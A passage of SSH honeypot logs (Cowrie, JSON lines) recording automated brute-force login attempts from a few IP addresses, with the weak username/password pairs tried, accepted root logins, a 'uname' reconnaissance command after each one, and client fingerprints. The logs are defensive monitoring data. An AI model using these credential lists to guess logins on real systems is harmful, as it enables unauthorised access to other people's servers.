0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:03:13.002906Z","src_ip":"45.125.211.194","session":"af1143a6cf1d"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:03:13.805264Z","src_ip":"45.125.211.194","session":"af1143a6cf1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:03:14.298391Z","src_ip":"45.125.211.194","session":"af1143a6cf1d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:03:14.299085Z","src_ip":"45.125.211.194","session":"af1143a6cf1d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:03:14.509417Z","src_ip":"45.125.211.194","session":"af1143a6cf1d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:03:14.510486Z","src_ip":"45.125.211.194","session":"af1143a6cf1d"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":23440,"dst_ip":"1.2.3.4","dst_port":22,"session":"502019fc24ba","protocol":"ssh","message":"New connection: 45.125.211.194:23440 (1.2.3.4:22) [session: 502019fc24ba]","sensor":"my-vps","timestamp":"2025-08-28T03:03:27.490025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:03:27.508244Z","src_ip":"45.125.211.194","session":"502019fc24ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:03:27.702344Z","src_ip":"45.125.211.194","session":"502019fc24ba"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:03:28.542066Z","src_ip":"45.125.211.194","session":"502019fc24ba"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:03:29.754478Z","src_ip":"45.125.211.194","session":"502019fc24ba"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":18559,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f6e3a6ba302","protocol":"ssh","message":"New connection: 45.125.211.194:18559 (1.2.3.4:22) [session: 4f6e3a6ba302]","sensor":"my-vps","timestamp":"2025-08-28T03:03:42.279142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:03:42.308676Z","src_ip":"45.125.211.194","session":"4f6e3a6ba302"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:03:42.495492Z","src_ip":"45.125.211.194","session":"4f6e3a6ba302"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:03:43.325302Z","src_ip":"45.125.211.194","session":"4f6e3a6ba302"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:03:43.765592Z","src_ip":"45.125.211.194","session":"4f6e3a6ba302"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:03:43.766535Z","src_ip":"45.125.211.194","session":"4f6e3a6ba302"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:03:43.981799Z","src_ip":"45.125.211.194","session":"4f6e3a6ba302"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:03:43.982942Z","src_ip":"45.125.211.194","session":"4f6e3a6ba302"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":44008,"dst_ip":"1.2.3.4","dst_port":22,"session":"265b3e279a28","protocol":"ssh","message":"New connection: 194.233.79.134:44008 (1.2.3.4:22) [session: 265b3e279a28]","sensor":"my-vps","timestamp":"2025-08-28T03:03:56.111371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:03:56.179201Z","src_ip":"194.233.79.134","session":"265b3e279a28"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:03:57.036171Z","src_ip":"194.233.79.134","session":"265b3e279a28"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":48226,"dst_ip":"1.2.3.4","dst_port":22,"session":"46136013f961","protocol":"ssh","message":"New connection: 45.125.211.194:48226 (1.2.3.4:22) [session: 46136013f961]","sensor":"my-vps","timestamp":"2025-08-28T03:03:57.171027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:03:57.182622Z","src_ip":"45.125.211.194","session":"46136013f961"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:03:57.387088Z","src_ip":"45.125.211.194","session":"46136013f961"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-28T03:03:58.108071Z","src_ip":"194.233.79.134","session":"265b3e279a28"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:03:58.220129Z","src_ip":"45.125.211.194","session":"46136013f961"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:03:59.431753Z","src_ip":"45.125.211.194","session":"46136013f961"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:04:00.046475Z","src_ip":"194.233.79.134","session":"265b3e279a28"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":51000,"dst_ip":"1.2.3.4","dst_port":22,"session":"e081c1d03fb5","protocol":"ssh","message":"New connection: 45.125.211.194:51000 (1.2.3.4:22) [session: e081c1d03fb5]","sensor":"my-vps","timestamp":"2025-08-28T03:04:11.950307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:04:11.966918Z","src_ip":"45.125.211.194","session":"e081c1d03fb5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:04:12.158640Z","src_ip":"45.125.211.194","session":"e081c1d03fb5"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:04:12.999303Z","src_ip":"45.125.211.194","session":"e081c1d03fb5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:04:13.434800Z","src_ip":"45.125.211.194","session":"e081c1d03fb5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:04:13.435477Z","src_ip":"45.125.211.194","session":"e081c1d03fb5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:04:13.644312Z","src_ip":"45.125.211.194","session":"e081c1d03fb5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:04:13.645435Z","src_ip":"45.125.211.194","session":"e081c1d03fb5"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":24352,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d133730c83e","protocol":"ssh","message":"New connection: 45.125.211.194:24352 (1.2.3.4:22) [session: 4d133730c83e]","sensor":"my-vps","timestamp":"2025-08-28T03:04:26.791545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:04:26.800980Z","src_ip":"45.125.211.194","session":"4d133730c83e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:04:27.001169Z","src_ip":"45.125.211.194","session":"4d133730c83e"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:04:27.831678Z","src_ip":"45.125.211.194","session":"4d133730c83e"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:04:29.555436Z","src_ip":"45.125.211.194","session":"4d133730c83e"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":26280,"dst_ip":"1.2.3.4","dst_port":22,"session":"41b74b31a9a6","protocol":"ssh","message":"New connection: 45.125.211.194:26280 (1.2.3.4:22) [session: 41b74b31a9a6]","sensor":"my-vps","timestamp":"2025-08-28T03:04:41.606576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:04:41.610879Z","src_ip":"45.125.211.194","session":"41b74b31a9a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:04:41.819165Z","src_ip":"45.125.211.194","session":"41b74b31a9a6"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:04:42.653777Z","src_ip":"45.125.211.194","session":"41b74b31a9a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:04:43.148908Z","src_ip":"45.125.211.194","session":"41b74b31a9a6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:04:43.149568Z","src_ip":"45.125.211.194","session":"41b74b31a9a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:04:43.365732Z","src_ip":"45.125.211.194","session":"41b74b31a9a6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:04:43.366815Z","src_ip":"45.125.211.194","session":"41b74b31a9a6"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":54717,"dst_ip":"1.2.3.4","dst_port":22,"session":"534031f5ebe7","protocol":"ssh","message":"New connection: 45.125.211.194:54717 (1.2.3.4:22) [session: 534031f5ebe7]","sensor":"my-vps","timestamp":"2025-08-28T03:04:56.463590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:04:56.464712Z","src_ip":"45.125.211.194","session":"534031f5ebe7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:04:56.675239Z","src_ip":"45.125.211.194","session":"534031f5ebe7"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar123","message":"login attempt [oscar/oscar123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:04:57.307828Z","src_ip":"45.125.211.194","session":"534031f5ebe7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:04:58.517506Z","src_ip":"45.125.211.194","session":"534031f5ebe7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34356,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4c6745da098","protocol":"ssh","message":"New connection: 212.227.125.160:34356 (1.2.3.4:22) [session: f4c6745da098]","sensor":"my-vps","timestamp":"2025-08-28T03:05:01.723492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:05:01.724947Z","src_ip":"212.227.125.160","session":"f4c6745da098"}
